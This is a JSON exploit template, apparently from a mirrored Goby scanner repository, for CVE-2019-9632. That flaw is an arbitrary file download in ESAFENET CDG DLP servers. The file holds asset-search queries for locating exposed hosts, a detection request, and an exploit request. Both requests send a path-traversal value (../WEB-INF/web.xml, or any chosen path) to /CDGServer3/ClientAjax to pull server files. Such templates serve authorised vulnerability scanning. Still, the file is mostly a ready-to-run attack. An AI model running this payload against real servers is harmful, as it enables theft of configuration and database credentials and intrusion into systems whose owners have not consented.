mirror of https://github.com/qwqdanchun/Goby.git
98 lines
3.1 KiB
JSON
98 lines
3.1 KiB
JSON
{
|
||
"Name": "ESAFENET CDG arbitrary file download (CVE-2019-9632)",
|
||
"Description": "ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.",
|
||
"Product": "亿赛通DLP",
|
||
"Homepage": "http://www.esafenet.com/",
|
||
"DisclosureDate": "2019-03-04",
|
||
"Author": "gobysec@gmail.com",
|
||
"FofaQuery": "app=\"亿赛通DLP\" || app=\"ESAFENET-DLP\" || app=\"亿赛通-DLP\"",
|
||
"GobyQuery": "app=\"亿赛通DLP\" || app=\"ESAFENET-DLP\" || app=\"亿赛通-DLP\"",
|
||
"Level": "1",
|
||
"Impact": "\u003cp\u003e代码实现了将文件下载到客户端,但是没有对传入的参数进行过滤,造成可以下载服务器任何文件,产生任意文件下载漏洞。比如下载系统配置,数据库配置文件,可以导致黑客顺利进入数据库或者系统的敏感信息。导致网站或者服务器沦陷。\u003c/p\u003e",
|
||
"Recommendation": "",
|
||
"References": [
|
||
"http://www.iwantacve.cn/index.php/archives/132/",
|
||
"https://nvd.nist.gov/vuln/detail/CVE-2019-9632",
|
||
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9632"
|
||
],
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"name": "file",
|
||
"type": "select",
|
||
"value": "../WEB-INF/web.xml",
|
||
"show": ""
|
||
}
|
||
],
|
||
"ExpTips": {
|
||
"Type": "Tips",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"data": "command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp",
|
||
"data_type": "text",
|
||
"follow_redirect": false,
|
||
"header": {
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
|
||
"Content-Type": "application/x-www-form-urlencoded"
|
||
},
|
||
"method": "POST",
|
||
"uri": "/CDGServer3/ClientAjax"
|
||
},
|
||
"ResponseTest": {
|
||
"checks": [
|
||
{
|
||
"bz": "",
|
||
"operation": "==",
|
||
"type": "item",
|
||
"value": "200",
|
||
"variable": "$code"
|
||
},
|
||
{
|
||
"bz": "",
|
||
"operation": "contains",
|
||
"type": "item",
|
||
"value": "<servlet-name>CDGPermissions</servlet-name>",
|
||
"variable": "$body"
|
||
}
|
||
],
|
||
"operation": "AND",
|
||
"type": "group"
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"data": "command=downclientpak&InstallationPack={{{file}}}&forward=index.jsp",
|
||
"data_type": "text",
|
||
"follow_redirect": false,
|
||
"header": {
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
|
||
"Content-Type": "application/x-www-form-urlencoded"
|
||
},
|
||
"method": "POST",
|
||
"uri": "/CDGServer3/ClientAjax"
|
||
},
|
||
"SetVariable": ["output|lastbody"]
|
||
}
|
||
],
|
||
"Tags": null,
|
||
"CVEIDs": [
|
||
"CVE-2019-9632"
|
||
],
|
||
"CVSSScore": "7.5",
|
||
"AttackSurfaces": {
|
||
"Application": ["ESAFENET-CDG"],
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
},
|
||
"Disable": false
|
||
} |